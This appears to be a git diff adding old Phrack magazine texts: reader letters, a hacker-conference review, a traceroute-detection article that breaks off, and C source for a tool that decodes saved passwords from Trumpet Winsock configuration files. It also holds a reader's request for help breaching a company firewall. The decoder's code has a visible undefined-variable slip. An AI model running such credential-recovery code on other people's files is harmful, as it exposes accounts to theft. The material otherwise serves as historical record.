+anyway.  And then I mentioned this and people were making fun of me, but
+I don't care.  I only care lately when people are like, "Oh that's what
+youy make?  I'm 17, have a criminal record and make three times that!". 
+Anyway, people are like, "No, no nirva is elite" so I thought, aha, I'll
+ask nirva what a good Irix sniffer is.  Oh, like now that people are
+laughing at that I have to keep this quets like secrtet.  I even think
+some Irix's don't have compile, like Solaris.  Christ, some Solaris's
+have jack shit.  Anyway.
+
+1) Why don't u log on #hack, or are you tres elite #!guild or beyond
+elite #www or #root #Twilight_Zone and more importantly
+
+2) Irix sniffer - captures passwords, actually compiles.  I hate
+coding.  I am a a lazy American.  And like, getting legit root access on
+an Irix...bvah, Irix sniffer!
+
+Bye-bye hackers
+
+oh PostScript
+
+3) Are you a cyberpunk?
+
+If I ran Phrack I wouldn't like Mr. Tishler have "Are hackers in general
+geeks?" as the question _everyone_ gets, I think, Are you a cyberpunk? 
+Would be it
+
+    [ 1.  We do hang out on as many public channels as we can stand for
+          at least a little bit of time each issue.  But really why do
+          you care if an editor of Phrack is there when people are shouting
+          about their penis size and how many drugs they are on?  If you
+          want to talk about something, we are always available by e-mail
+          and will usually talk to you by private msgs if we aren't busy
+          doing something else at the moment.  
+      2.  Anyone want to write us a really cool one?
+      3.  Who are we to change tradition? ]
+
+0x1e>-------------------------------------------------------------------------
+
+
+Hello,
+
+I wanna ask you something about the following problem. I'm really stuck (the 
+1st time ;-)) ! Is it possible to pass a firewall and access one of the 
+domains behind it ??  I'm afraid that the sysadmins did their job fine :( 
+I've got everything what I need but that damn  wall....I'll give you some info 
+that I've obtained so far:
+
+- IP-address of the firewall,
+- All the domains + IP adresses behind this wall,
+- The login-account of the superuser,
+- All the open-UNIX ports behind the wall,
+- The company has no WWW-site but they do have an Intranet.
+
+portscanning gives me this: 
+21~=ftp,
+23~=telnet,
+25~=smtp-mail 220 x.x.x.x SMTP/smap Ready.
+
+This is at IP x.x.x.2 but I found out that also x.x.x.1 belongs to the same 
+company with 3 other ports...
+7~=echo,
+9~=discard-sink null
+79~=finger.
+
+Is the only way to go by D.O.S. attack the firewall and then spoof the 
+firewall's IP addres ?
+
+But how to start ?? Woul u be so kind to help me ??
+
+TIA,
+theGIZMO
+
+
+    [ fragmentation. ]
+
+
+0x1f>-------------------------------------------------------------------------
+
+
+Ok, this might sound dumb , but, I think it would be cool to have this as a
+slogan.
+
+"Blah, blah, blah, and along with your subscription, you'll receive a
+LIFETIME WARRANTY ON YOUR BRAIN!!  That is, if for any reason your brain
+can't figure out a problem you're having hacking, just e-mail us with your
+question and we'll be glad to help you out. Note: Please PGP encrypt all
+questions regarding hacking questions. Thank you."
+
+Do you like it? Note that blah, blah, blah is whatever you would it to be.
+Such as, "You can subscribe to Phrack Magazine by sending e-mail to
+Phrackedit@infonexus.com requesting you be put on the list, and along with
+your subscription......" 
+
+Ok, thats it....write back if you like it....or if you don't. Here is my PGP
+public key.
+Oh yeah...you might have gotten mail from PhatTode@aol.com. That is me. So
+direct replies to those messages to this new address...Thank you.
+
+    [ You're right.  It does sound dumb. ]
+
+0x20>-------------------------------------------------------------------------
+
+
+Hey,
+   sorry to bother you but I just got Redhat Linux 4.1 in the mail.  I
+think it's great besides the fact that I hear that it lacks security. 
+HOw do I get PGP up in it?  Is it easy to install?  Thanks.
+
+Killer Bee
+  
+    [ yes, very easy to install.  Read the documentation.  It's different 
+    for different platforms.  ]
+
+0x21>-------------------------------------------------------------------------
+
+
+Hello 
+
+	My name is Joseph and I am intrested in any information you may have
+about the early day's of hacking and current hacking underground.. also
+I understand you are a member of the guild ?? what is this?
+
+Joseph --> jgriffiths@iname.com
+
+    [ The guild is like what r00t was before r00t got all famous and became 
+    greatly feared and admired.  Oh.  And we spend most of our time counting
+    our millions and having sex with models. ]
+
+0x22>-------------------------------------------------------------------------
+
+
+Hi there,
+
+Do you know where I can find the Rosetta stone for interpreting the output
+of Solaris  lockd & statd in debug mode?  I can't find any public information
+about it, even on Sun sites.  Sun Microsystem refuses to let their lab
+publish anything about interpretation of system calls outputs.  Are they
+afraid that they will be losing support contracts if this information gets
+out?  The man page does not include arguments to run in debug mode, and
+what's the point of providing the tools w/o the means to interpret the
+result?  Teach a man how to fish .....you know.
+
+Thanks.
+
+Christine
+
+    [ Someone want to write an article on it? ]
+
+0x23>-------------------------------------------------------------------------
+
+
+In regards to the article on Ethernet spoofing:
+
+As an aside note for the highly paranoid:  ethernet spoofing
+
+Note: some of this is theorized, and might not be 100% accurate - if you
+get the jist of it, you should be able to figure out if it works for
+you.
+
+It is possible to spoof ethernet hardware addresses as well.  Some cards
+will allow you to do this easily, but you need to have card programming
+docs (check the Linux kernel source for your card driver-!!).  Others
+won't let you do it at all, and require a ROM change, or worse it might
+be solid state logic on the card - EVIL.  Course you might be able to
+get around solid state stuff by recoding the ROM, but I wouldn't
+recommend it unless you don't have the $70 to buy a new card, and have a
+month or two to spend in the basement.
+
+	... rest of stuff(tm) deleted ...
+
+Interestingly enough, most of the Sun sparc stations I've seen allow you to
+enter in any mac address that you want using ifconfig(1M).  I "know someone"
+who picked up a Sparc IPC for $50 (Can $$) and upon discovering that the
+battery that powers the IDPROM was deceased, we needed to fake a mac address
+to get it to talk to someone.  Sun's default is 0:0:0:0:0:0 but the 3Com
+card's mac (from a different network) worked quite nicely.
+
+Interesting concept the author has though, I'll be f*ck around with the idea
+when I'm supposedly doing work =)
+
+
+    [ MAC address spoofing techniques are well known about, especially under
+    Sparcs.  However, do some research, write some code and an article and 
+    submit it... ]
+
+0x24>-------------------------------------------------------------------------
+
+
+I love your e-zine it is the coolest thing i've read.
+
+    [ Thank you.  It's the coolest thing we've written. ]
+
+Please could you tell me any ways to violate the security of a "MacAdmin"
+based system on the Apple Macintosh.
+
+    [ What's a Macintosh? ]
+
+Mark "Vombat" Brown
+
+May phrack and Fiona live forever!
+
+
+    [ ...and may Phrack and Fiona do a joint project some time soon... ]
+
+
+0x25>-------------------------------------------------------------------------
+
+
+	Hey, I sent this to you because yer handle is shorter.
+Anyways, great job on issue 50, always a pleasure to read it, and
+in article 12, by Sideshow Bob, I was wondering about the "tail"
+command. I don't seem to have this nifty util, and was wondering 
+if perchance, you knew where I could get a copy. Also: the Skytel 
+article sorta looked like an advertisement to me. Nothing against that, it's
+still pretty interesting to learn of Skytel's history, and of the nifty things
+out there, but I was wondering if it sounded like a detailed ad to anyone else.
+But if you could help me out with the tail command, I'd be so grateful.
+			Joel Thomas
+
+    [ Standard GNU utility.  Try your local unix box. ]
+
+0x26>-------------------------------------------------------------------------
+
+
+
+| 
+| G'day mate, 
+| I am a computer user in Camplong, Timor.  I have limited internet access, as
+| it is a long distance phone call from home.  I have downloaded your issues
+| 46-50 and haven't read through them all yet, but what I see looks good.  
+| What I need from you is a UUENCODER program so I can extract the included
+| files. 
+
+    [  Standard GNU shell tool.  Any Unix host will have it.  Do a websearch   
+    to get it for Windows.  ]
+
+| I am also confused on how to extract the .c files from the text
+| files(philes?). 
+
+    [  As it says in the header file: gcc -o extract extract.c  
+
+    then `extract filename`  ]
+
+| I am not a C programmer, but my dad is.  
+
+    [  That's nice. ]
+
+| 
+| I need PGP.  Although my side of the internet is safe, noone reading others
+| letters (the sysop is too dumb or something to even think about that) I want
+| my mail to get where it is going in one piece unread. Where can I find a
+| free copy of PGP?  
+
+    [  Do a websearch.  ]
+
+0x27>-------------------------------------------------------------------------
+
+
+
+.. crack me up. Excellent social porno in your reader's letters section.
+Keep on commenting. Might start screaming soon.
+
+Um, the guy from slovakia might want to get hold of Bill Squire for
+information on smartcard programmers; as I seem to recall, he likes
+messing with these electronic devices.
+
+Another thing; I though DC was now just sticking to his viola? According
+to all the news he only started hacking because someone vandalized it? 
+Wonder if I should have used the same thing in my case: "I plead not
+guilty, Magistrate sir, but the University's good-for-nothing courses
+drove me to it." Whatever it takes, I guess.. 
+
+Yum. 
+
+-me.
+
+
+0x28>-------------------------------------------------------------------------
+
+
+This is a response to p48-02 in which one "Mr. Sandman" proceeded to spew
+out eleven paragraphs of blatant misinformation. Rather than lumbering
+through a point-by-point rebuttal to his letter, I will quickly summarize
+what was wrong with it, and then state a few facts to clarify some things.
+
+KoV never touched Skidmore. This is something that anyone who was in the
+group will attest to. And not just to follow the old "admit nothing, deny
+everything" plan. In reality, we NEVER touched it.
+
+In retrospect, I find it very odd that someone from New York would claim
+to know so much about the inner workings of a decidedly regional
+[Connecticut] hacker collective. While we weren't exactly xenophobic, we
+certainly didn't go out of our way to divulge information about ourselves
+to anyone outside the group (or the state, for that matter). This would
+explain why Mr. Sandman's letter was riddled with insufferably laughable
+lies that were obviously the product of a jealous and dejected outsider.
+
+One thing that needs to be put to rest is that we were certainly not "a
+bunch of egotistical and immature criminals" as Mr. Sandman would have you
+believe. The primary focus of KoV's efforts was not to "break into
+universities" or "make ourselves look bigger and more important than we
+were." We existed, first and foremost, to unify what was, at that time, a
+greatly divided scene. Squabbling and infighting among those few real
+hackers who were still around was leading to a critical breakdown at the
+fundamental level. Something had to be done, and fast. In an effort to
+bring together a group of like-minded individuals (not only from the
+hacker perspective but also in terms of anarcho-libertarian philosophy and
+ideology), I started KoV with an intentionally humorous name behind the
+acronym. It was an almost immediate success, and over time I certainly
+accomplished all that I'd set out to do, and then some.
+
+The current state of the "Connecticut hacker scene" (for lack of better
+terminology) is much different than it was in the summer of 1994. People
+are working together, cooperating, and the incessant "civil wars" which
+plagued us back then are all but nonexistent today. I think I'd be well
+within my rights to credit KoV with helping to assure that those problems
+are now but a memory. It really bothers me when anonymous instigators like
+Mr. Sandman attempt to dishonor all the work that we did to get this far,
+without even really having a clue as to what we were (and are) all about.
+Perhaps he and his ilk could benefit from such groups as KoV. Because no
+matter how I feel about him and his actions...
+
+        "The more we fight among ourselves,
+                the less of a threat we are to the system."
+
+- Valgamon
+  Sat Jun 07 15:49:25 EDT 1997
+
+
+0x29>-------------------------------------------------------------------------
+
+What up.
+
+Yo, Ima hack/phreak from back in the day (1984) 
+
+My 1st bbs was on an atari with a floppy drive and 64k!
+
+Nowadays, I do rap music and acting, live in Los angeles (im from western NY), 
+and run 900#s and adult websites.
+
+Check this out, I need to thangs:
+
+#1: FTP space for adult pix (not really important, since my host gives me 
+unlimited space), but I have no anonymous ftp capabilities)
+
+#2: Windows NT or unix
+
+Can you help??
+
+Have broom (Music software) will travel (trade)
+
+
+    [ We will trade you unix for a rap song about Phrack and a movie role 
+      for route. ]
+
+0x2a>-------------------------------------------------------------------------
+
+
+This is in reference to the first part of your " PGP Attack FAQ," which
+addresses the length of time necessary to brute force IDEA. Perhaps I'm
+overly paranoid (naw...) or just a perfectionist, but I would like to
+point out two things about this:
+
+1) Somewhat of an error in your math?
+2) "As far as present technology is concerned."
+
+"As we all know the keyspace of IDEA is 128-bits. In base 10 notation
+that is:
+
+
+340,282,366,920,938,463,463,374,607,431,768,211,456.
+
+To recover a particular key, one must, on average, search half the
+keyspace. That is 127 bits:
+
+
+170,141,183,460,469,231,731,687,303715,884,105,728.
+
+If you had 1,000,000,000 machines that could try 1,000,000,000 keys/sec,
+it would still take all these machines longer than the universe as we
+know it has existed and then some, to find the key. IDEA, as far as
+present technology is concerned, is not vulnerable to brute-force
+attack, pure and simple. "
+
+                Somewhat of an error in your math
+                ========================
+
+OK, let's examine the math. For simplicity, let's say we only had one
+machine that could try 1,000,000,000 keys/sec. The number of seconds it
+would take for this machine to search half the keyspace, and thus find
+the correct key would be
+170,141,183,460,469,231,731,687,303715,884,105,728 divided by
+1,000,000,000. This would yield 170,141,183,460,000,000,000,000,000,000
+seconds of maximum search time before finding the key. This in turn
+would be 2,835,686,391,010,000,000,000,000,000 minutes =
+47,261,439,850,100,000,000,000,000 hours =
+1,969,226,660,420,000,000,000,000 days = 5,395,141,535,400,000,000,000
+years = approximately 5.395 sextillion years. If there are 1,000,000,000
+of these machines as you suggest, then the years required for a
+successful brute force crack would be 5,395,141,535,400,000,000,000 /
+1,000,000,000 = 5,395,141.5354. So, it comes down to: are you saying
+that these 1,000,000,000 machines are acting as a collective entity or
+can *each* one of these machines operate on 1,000,000,000 keys/sec and
+thus operate together at a speed of (1,000,000,000) * (1,000,000,000) =
+1,000,000,000,000,000,000 keys/sec. If the first is true, then you are
+correct in saying that "it would still take all these machines longer
+than the universe as we know it has existed and then some," as it would
+take app. 5.395 sextillion years (scientists estimnate that universal
+redshift shows the universe to have existed thus far for only 15 billion
+years). If the second is true, then it would take far less time than the
+existence of the universe at app. 5.395 million years... which could be
+compared to twice the amount of time human beings have existed on earth,
+or just a fraction of the time dinosaurs were here.
+
+
+    [ Hrm.  Take it up with Schneier. ]
+
+
+                 "As far as present technology is concerned."
+                 =============================
+
+How far is present technology concerned?! The Intel/Sandia Teraflops
+Supercomputer can reportedly perform 1.06 trillion floating point
+operations per second (refer to 
+http://www.intel.com/pressroom/archive/releases/cn121796.htm). Assuming
+
+    [ Keep in mind that factoring and brute force key searches are 
+    integer-based calculations, not floating point operations. ]
+
+one of these "instructions" can operate on, let's say something around a
+28th power float variable, then disregarding read/write operations, the
+system can search at 1.06 trillion keys/sec. This yields a total search
+time (before a successful "hit") of
+170,141,183,460,469,231,731,687,303715,884,105,728 / 1.06 trillion =
+160,510,550,434,000,000,000,000,000 seconds = 5,089,756,165,470,000,000
+years or 5.089 quintillion years... still a rediculous amount of time
+even on the fastest publicised system in existence. Now, this system,
+the Intel/Sandia Teraflops Supercomputer is made up of 9,200 200 MHz
+Pentium Pro processors. Being that they didn't have to buy them at
+markup/retail and they manufacture them from scratch for their own
+purposes, let's say it cost $500 per chip plus some negligible ram and
+labor costs (how much ram do you need when you have a gig+ worth of
+onboard cache, etc.). With 9,200 chips, the system would take about
+$4,600,000 to build. A practical question: if federal taxation is %28 on
+an annual income of $80,000, where does all the money go? Well, let's
+say a Billion dollars per decade goes to the NSA to build whatever they
+want.  If the 9,200 chip system cost $4,600,000 then a little algebra
+reveals that with one billion dollars, the NSA could purchase
+approximately 2 million 200 MHz pentium pros. If the 9200 chip system
+did 1.06 trillion keys/sec, thus the 2 million chip system would be
+capable of approximately 230,434,782,609,000 keys/sec or app. 230
+trllion keys/sec. Now, say the NSA is smart enough not to buy crappy x86
+chips and instead get 500 MHz DEC Alpha RISC chips. This is 300 Mhz or 3
+fifths faster than a 200 MHz pentium pro approximately. so 230 trillion
++ (230 trillion * 3/5) = 368,695,652,174,000 or 368 trillion keys/sec.
+The original calculation yields that the successful search time would be
+170,141,183,460,469,231,731,687,303715,884,105,728 / 368,695,652,174,000
+= 461,467,832,499,000,000,000,000 seconds = 14,633,048,975,700,000. Ok,
+great... so now we're down to 14.6 quadrillion years of search time,
+which means that at least now we may get REALLY lucky and hit the right
+key within a certain degree of insanity. But, this was only a billion
+dollars we gave the NSA in a decade. If we're especially paranoid, let's
+say the government was so concerned over nuclear terrorists sending
+encrypted messages, that the NSA got a TRILLION dollars to build a
+system. That divides the whole equation by a thousand making the search
+time 14,633,048,975,700 years or 14.6 trillion years... STILL
+rediculous. Ok, so let's say that now we're giving the NSA a HUNDRED
+TRILLION DOLLARS thus dividing the search time by 100 yielding
+146,330,489,757 years which is about ten times longer than the existence
+of the universe. But now, if we had 1,000,000,000 of *these* machines
+working concurrently the search time would wind up being 146.330489757
+years. But, if each RISC processor were replaced with a small piece of
+nanotechnology, each piece of this nanotech being 100 times faster than
+the alpha chips, you get 1.46330489757 year. There ya have it... some
+classified nanotechnology, 100 trillion dollars, and a DAMN lot of
+landmass all multiplied by 1,000,000,000 and you've brute forced IDEA in
+a year and a half. I won't go into the tedious calculations, but an
+object with the surface area of two of our moons would approximately be
+able to house this complex. Now, as I know you're asking about where to
+store all the keys... and the fact that this drive would be bigger than
+a solar system and so on, just have the keys generated using the same
+PRNG in the brute force attack... you'll just have three times the
+instructions (write for the generation, read to get it, write to compare
+it) so multiply the search time by three. The technology is possible...
+it's economics and territory that doesn't work.
+
+    [ Theorectially shure.  But you have sorta just proved the point that
+    it is not feasible. ]
+
+--gKHAN
+
+
+0x2b>-------------------------------------------------------------------------
+
+
+The snippit in P50 in section 02 of the zine by Xarthon entitled
+   
+> Yet another Lin(s)ux bug!  "IP_MASQ fails to check to make sure that a
+> packet is in the non routable range." "So in conclusion, you are able to
+> spoof as if you are on the inside network, from the outside. "
+
+Is so incomplete I would almost call it a lie. The only way that Linux
+would do this is if the person setting up the IP-Masq system issued the
+command "ipfwadm -F -p masquerade" which if you read the IP-Masq HOWTO it
+tells you explicity NOT to do for this very reason. My retort for Xarthon
+and all others who do stupid ass things like leave port 19 open and such;
+is that Linux only sux if you do. To wit, don't be a moron, and you won't
+have to complain that it sucks.
+
+Swift Griggs 	      | UNIX Systems Admin
+
+
+0x2c>-------------------------------------------------------------------------
+
+
+Hi there, 
+
+I have a question regarding a certain piece of hardware that has come
+into my possession. Since this little piece of equipment contains no
+indications of its intended use i have no idea what this thing could do.
+So here's a descrition of the little box; i hope you might be able to
+provide me with more information on what this device is supposed to do.
+
+Description:
+-lightgrey rectangular casing (13CMx9CMx3CM)
+-frontpanel has one green LED, a connector labeled "SCANNER", and a
+little door which reveals two sets of dipswitches (2 sets of 8, labeled
+"DIPSW1" and "DIPSW2")
+-backpanel has three connectors, a RJ4-like connector (only it has 6
+lines instead of 4; it looks like a connector for a Memorex Terminal)
+labeled "A", a standard IBM-PC keyboard connector labeled "B", and a
+small (9-pin) serial interface-connector labeled "C".
+-there is a sticker with a serial number, a barcode, and "Made in
+Taiwan" on the bottom
+-the circuit-board contains IC's of Sony, Philips, and TExas Instruments
+-there is also one removable EPROM, made by AMD; it has a label on it
+which reads "V2.61 CS:EF88"
+
+
+I have found that a normal keyboard plugged into connector B, while a
+KBD-to-RJ-jack cord is plugged into connector A will allow the box to be
+placed between the keyboard and the kbd-port; so my first guess would be
+that this is some kind of filtering device. But that doesn't explain why
+there is a serial-connector and this "SCANNER" connector present.
+
+So, do you know what this thing is ?
+
+-lucipher.
+
+    [ Readers? ]
+
+0x2d>-------------------------------------------------------------------------
+
+
+  hi, my friends.i am a newbie come from China,i had read some Phrack magazine.
+but to me surprise,i had not success compile a program still now.i send e-mail
+to the author,but server tell me there is no this user.
+  for example, phrack-49-15 describle tcp port scan,but i  can not find
+ip_tcp.h, other paper tell me a way to guess password,and said the program only
+need Ansi complier,but i can not success too. oh.my god.
+  i use sun os ,gcc, i need your help, thanks.
+                                   yours 
+                                        keven zhong
+
+    [ Here at Phrack, we use TheDraw for ANSI compilers.  I hope that
+      answers your question. ]
+
+0x2e>-------------------------------------------------------------------------
+
+
+I'm just writing this to say thanks to all the hackers that represent Phrack
+and work hard to keep it going,you guys are truly keeping the new generation
+alive.If it weren't for Phrack i'd probably never have wanted to waste my time
+with computer's,the technical info is first class and a lot better than most
+of the crap out there.I would suggest that maybe once in a while u guys could
+write some more stuff geared towards the newbies,it really is important
+because most people who aren't familiar with the terms get completely
+lost.Down here in Montreal(514),most people think hacking is spreading virri
+or u/l shitty trojans,there's no talk about unix or networks.We really need
+some help down here,the scene is practically dead and most newbies don't have
+any support to help them get started.Anywyas i just want to say keep up the
+good work,and it's really appreciated.
+--
+| Return Address:      Dave.Conway@claw.mn.pubnix.net
+| Standard disclaimer: The views of this user are strictly his/her own.
+
+    [ Thanks, if anyone cool is in Montreal, e-mail this guy and revive
+      your scene. ]
+
+
+----[  EOF
diff --git a/phrack51/3.txt b/phrack51/3.txt
new file mode 100644
index 0000000..addf215
--- /dev/null
+++ b/phrack51/3.txt
@@ -0,0 +1,1427 @@
+---[  Phrack Magazine   Volume 7, Issue 51 September 01, 1997, article 03 of 17
+
+
+-------------------------[  P H R A C K     5 1     L I N E N O I S E
+
+
+--------[  Various
+
+0x1>-------------------------------------------------------------------------
+ 
+                                A Review of H.I.P.
+
+                          <torquie@landslide.openix.com>
+
+
+Out of all of the cons I've been to (and I've been to loads), Hacking In
+Progress was definitely the coolest and the most surreal hacker con ever.
+This was definitely a European event though there were a few arrivals from the
+US.  The atmosphere was carnival.  It was like an old style con where you got
+together to meet up with people face to face, exchange ideas and basically
+have loads of fun.
+
+Around 2500 people attended: hackers, artists, media, police... a total mish -
+mash of cultures and ideas.
+
+HIP was a total geek-fest.  Computer networks were spread across the campsite.
+In the mornings (when I actually slept) I awoke to the chirping of birds and
+the booting up of windows95.  In the evenings I sat around the campfire
+chatting to mates while the hardcore's played DOOM and exchanged warez.
+
+During the day there were various activities.  One tent held lock-picking
+classes.  In another a group of astronomers had set up telescopes linked to
+computerized data-tracking equipment that you could print out.  The
+cypherpunks had their own tent set up and I snuck in occasionally for a chat
+and a cold drink.
+
+There was a videoconference link connected to HOPE but it crashed and was
+abandoned.  In the main marquee, there were lectures on the usual faire of
+hacker interests: computer security, the legalities of hacking, anonymous
+re-mailing, cryptography, etc.  The weather was boiling and my melted brain
+found it exceedingly difficult to concentrate.  Most of my time I spent
+outside in the shade or the tent housing the bar, talking to people
+individually or in small groups.
+
+The public telephones mysteriously malfunctioned on Sunday and could only be
+used to dial the emergency services.  However if you dialed the Dutch
+equivalent to 911 you got a dial tone, so you could dial anywhere in the world
+for free.  Supposedly this was a 'programming error' on the part of the Dutch
+Telephone Company.
+
+Smaller more interactive workshops were also held.  Though the technical
+lectures were really interesting, my favourite event was Padeluun's yo-yo
+workshop.  Besides the fact that I got to keep the yo-yo, the workshop itself
+was farcical performance art.  If you know the background you will understand
+what I mean, if not...  Padeluun is a member of the FOEBUD group from Germany.
+These people do some really brilliant projects and are very politically
+motivated.   One of their projects was to put up networks during the war in
+the former Yugoslavia.  They also work to distribute PGP to groups in
+countries with oppressive governments.  It is not just anyone who could pull
+off a workshop like this.  This was high irony.  When I walked up the workshop
+had already started and I came in on the line 'yo-yoing is good for social
+engineering, no one finds you a threat when you yo-yo'.  As the head of the
+Dutch Computer Crimes division was in attendance I thought this rather
+hilarious.
+
+The attitude at HIP was really positive.  The European definition of hacking
+has always been broader than the American definition.  Europeans accept the
+idea of 'social hacking'.  Not hacking in the Unix sense but in the sense of
+subverting technology, whether it be by pirate radio, hacking smartcards,
+social engineering the feds... or whatever.  Unlike some cons I've been to in
+the past couple of years, the atmosphere of HIP was really mature.  There
+weren't any young kids trashing anything, there weren't any stairwells to
+flood, no one set off any fire alarms or randomly destroyed anything through
+boredom, and generally the people who attended had a lot of respect for the
+event and the organisers.  Which means that no one I saw acted like a total
+wanker and no one is going to run the event out of town.
+
+On a personal note it was brilliant meeting people there and hearing of some of
+the most recent projects people had on the go.  Since the last time this event
+was held  (HEU, 'Hacking at the End of the Universe' held at the same spot in
+1993), the hacker scene has changed.
+
+One difference that struck me straight away was the fact that there were just
+as many females as males.  And these women weren't girlfriends or hacker ho's
+but women that are getting to grips with the technology and using it for
+various projects.
+
+Felipe Rodrigez who started Hack-tic along with Rop Gonggrip back in the early
+days of Holland's hacking scene, has always been active on the political front
+"For us, things have changed.  They used to call us criminals and think of us
+as terrorists.  Now we advise the Ministry of Justice.  We're the only ones
+who know the technology here."
+
+Rodrigez also believes that hacking is still a very useful tool in countries
+like Peru or Serbia where the state is unfair and citizens need to "defend
+themselves."  This view has made him unpopular with the secret services who
+consider the former Hack-tic more dangerous now that they have power in the
+business community in Holland.
+
+Though things may have changed since the early days of hacking, the European
+scene seems to have become something more grown up.  "The hacker scene is now
+pockets of culture.  There's alternative media, the old hacker culture, the
+Unix hackers, irc, even astronomers who are into their own computer culture.
+It's now for all of the people, which is why we call it Hacking in Progress,
+we have progressed"
+
+As a summation, HIP was fantastic.  It was brilliant to see most of the people
+I have known in the European scene in one place and to meet some new people
+who I will definitely keep in touch with the coming years.  I'm really looking
+forward to the next one!  If you want photos and other articles check out the
+HIP site at www.hip97.nl.
+
+
+0x2>-------------------------------------------------------------------------
+
+To: All it may concern
+
+	It has come to my attention, that people are forgetting what 
+hacking is.  I'm not speaking about the freedom of information, or the 
+pursuit of learning..  I'm talking about the fact that it is illegal and 
+against the law..  I hear left and right..  " So and So has been busted.. 
+lets protest..  Let's get the Hacker Defense Fund(TM) to help us! "
+
+Hey time to wake up..  YOU ARE A CRIMINAL IF YOU ARE COMPROMISING THE SECURITY 
+OF SITES/PHONE SYSTEMS/ETC..
+
+Not a rant, just a note that it's time to face up to your responsibilities.. 
+
+- Someone
+
+0x3>-------------------------------------------------------------------------
+    
+/*
+   TRUMPET WINSOCK PASSWORD HACKER by DOCTOR JEEP 11/96
+
+       erode@avana.bbs.comune.roma.it
+
+   written for Turbo C 2.0 (C) (old but cheap :) )
+
+   The author doesn't take any responsabilities for any proper/improper use of
+   this program.
+*/
+
+<++> winsock_passwd_hack.c
+#include <stdio.h>
+  unsigned char
+spazio[21]={88,75,55,47,114,66,87,92,35,68,69,87,101,38,122,123,45,117,74,78};
+  unsigned char name[34], fono[33], passc[33],riga[33],passd[23];
+  unsigned char user[11]="$username=", tele[9]="$number=",
+pass[11]="$password=";
+
+  FILE *f1;
+  int i,v,c,k;
+
+decodi (int ver) {
+  int ls,b;
+  if (ver==20) ls=10;
+  if (ver==21) ls=11;
+  b=strlen(passc);
+  for (i=ls;i<b;i++) {
+      v = passc[i];
+      v = v + 32 - spazio[i-ls];
+      if (v < 32) v = v + 96;
+      if (i-10<21) passd[i-ls] = v;
+  }
+}
+
+scrivi(int n, int st, unsigned char str[], char messaggi[])
+  {
+  c=strlen(str);
+  printf("%s",msg);
+  for(k=n;k<c-st;k++) {
+     printf("%c",str[k]);
+  }
+  printf("\n");
+
+}
+
+main (argc,argv)
+  int argc;
+  char *argv[];
+  {
+  printf("\n\nTrumpet Password Hacker by Doctor Jeep 96  NO (C)\n\n");
+  if(argc!=2) {
+    printf ("Specify the trumpet .ini file with his path \n");
+    exit(1);
+  }
+
+  f1=fopen(argv[1],"r");
+  if (f1==NULL) {
+      printf("\nUnable to open configuration file");
+      exit(1);
+  }
+
+  printf("\n");
+  while(!feof(f1))
+  {
+      fgets(riga,32,f1);
+      if (strspn(riga,pass)==10) strcpy(passc,riga);
+      if (strspn(riga,user)==10) strcpy(name,riga);
+      if (strspn(riga,tele)==8) strcpy(fono,riga);
+  }
+  fclose(f1);
+
+
+
+  scrivi (8,1,fono,"Server's Tel. #: ");
+  scrivi (10,1,name,"Username: ");
+  decodi (20);
+  scrivi (0,1,passd,"Trumpet 2.0 password: ");
+  decodi (21);
+  scrivi(0,3,passd,"Trumpet 2.1F password: ");
+}
+<-->
+
+/* END OF FILE by Doctor Jeep */
+
+
+0x4>-------------------------------------------------------------------------
+
+
+Tools for (paranoid ?) linux users 
+
+by whynot AKA baldor
+
+-> you need basic TCP/IP knowledge to understand this article <-
+
+Recently not only then number of attacks on big / commercial servers and
+machines with fast connections has increased, but even users with dial-in
+computers have been attacked or spied on.  A good example is the winnuke.c
+program that has been released on BugTraq and has been used excessively.
+Although these attacks are not as "threatening" as the attacks that are
+launched against big servers it can get really annoying if some idiot
+frequently tries to hack you / takes your machine down / delays you.
+
+Most Linux distributions have reacted to this development and made their
+telnet/ftp/whatever servers log every access. In this way you can easily put 
+annoying hosts into /etc/hosts.deny. But in my opinion there are (at least) 
+two things missing which I want to discuss in detail...
+
+1. Detecting traceroutes
+
+Traceroute is a really powerful command, which is often used to detect where 
+the computer that is being tracerouted is located and to which network it is
+connected.  Because of some simple reasons you can *not* simply make it 
+impossible for people to traceroute you, so the best you can do is detect *if* 
+someone traceroutes you, find out *who* tracerouted you and confuse him a bit.
+
+1.1 How does traceroute work ?
+
+Basically traceroute just sends out IP/UDP probe-packets to the specified host.
+To find out how the packet is routed (through which hosts it is going) 
+traceroute uses the TTL (time to live) field of the IP header. This TTL field
+specifies an upper limit of how many routers this packet can pass through 
+before it gets dropped.  Every router decreases the value of the field when 
+the packet in question arrives, until it becomes 0.  If this happens the
+router sends back an ICMP TIME_EXCEED to the sender of this packet (which is 
+the host that is tracerouting).
+
+So the strategy traceroute uses to trace the path of a packet is to send
+out packets to the target host putting an increasing value (starting with 1) 
+into the TTL field.  If a host reports ICMP TIME_EXCEED traceroute prints out 
+its address and the time that passed from the sending of the IP/UDP probe 
+packet until the receiving of the ICMP TIME_EXCEED.  After that it will 
+prepare a new probe packet with an IP TTL one greater then the previous packet.
+
+Traceroute will continue doing this until it receives an ICMP PORT_UNREACHABLE 
+packet from the target address, or the max hop count has been reached (defaults
+to 30).
+
+To understand this we should take a look at the UDP part of the packet we
+talked about above.  To detect somehow that it finally reached the target host 
+and should not try to go any further traceroute uses the connectionless UDP 
+protocol.  The UDP part of the probe-packet is addressed to a port which is 
+barley/never used (in nearly all Unix implementations 33434+ the TTL included 
+in the IP-Packet).  Since (normally) nothing is listening on port 33434 (and 
+above) the target host sends back an ICMP PORT_UNREACHABLE signal that tells 
+traceroute that it reached the target host and can stop sending any more 
+packets.
+
+Since the strategy of traceroute is a bit complex here is an (a bit simplified) 
+example. Let's say that you are host "source" and tracerouting your way to 
+host "target".
+
+    source:/root # traceroute target
+    traceroute to target (134.2.110.94), 30 hops max, 40 byte packets
+
+Now source sends out a probe packet to target (port 33434) with a TTL of
+1.  The packet is passing "some_host" and the router decreases the TTL of
+the packet.  It recognizes that the packet has "expired" (TTL=0) and sends
+back an ICMP TIME_EXCEED to source.  Now traceroute uses the information
+included in this packet to print out data about the first host the packets
+to target are passing:
+    
+    1  some_host (142.45.23.1) 2.456 ms
+
+Another probe packet is sent out by source, this time the TTL is 2 and the
+port is 33434+1 = 33435.  It gets back another ICMP TIME_EXCEED packet
+this time from another_host:
+
+    2  another_host (142.45.10.1)  3.983 ms 
+ 
+The third Probe has the TTL set to 3 and is addressed to port 33436. 
+Traceroute now gets back an ICMP PORT_UNREACHABLE from "target": 
+
+    3  target (142.45.10.13) 4.032 ms
+ 
+That's it ! Traceroute now finished its job and quits.
+
+    source:/root #
+    
+Please note that traceroute by default sends out three packets containing
